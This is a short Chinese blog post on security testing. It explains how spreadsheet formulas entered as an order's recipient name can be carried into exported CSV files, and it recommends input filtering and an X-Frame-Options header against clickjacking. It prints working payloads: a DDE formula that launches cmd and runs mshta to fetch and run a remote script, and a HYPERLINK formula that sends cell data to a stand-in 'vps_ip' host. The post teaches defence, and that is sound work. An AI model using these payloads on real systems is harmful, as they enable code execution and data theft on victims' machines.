当前位置:   article > 正文

安全测试 csv 注入_csv注入危害

csv注入危害
  1. csv 注入
    用户下单时,收货人姓名为 =cmd|A1!A1 ,下单后 在订单系统可导出订单到csv , 则=cmd|A1!A1 则在csv 的收货人列中的某单元格中, 是可以触发打开cmd 的,黑客是可以通过cmd 做一些危险操作,比如: =+1+cmd|’/c mshta.exehttp://192.168.233.102:8080/a’!A0
    =HYPERLINK(“http://vps_ip?test=”&A2&A3,“Error: Please click me!”) 这种 可把csv 中的数据泄露
    方案: 输入文本中=,+,-,@ 需要过滤

  2. 点击挟持:ngnix 增加X-frame-options :always 配置 确保不会出现iframe 覆盖页面,篡改点击请求

本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号